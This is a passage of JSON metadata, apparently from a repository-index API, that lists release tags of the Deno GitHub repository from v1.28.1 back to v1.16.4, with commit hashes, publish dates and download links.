commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v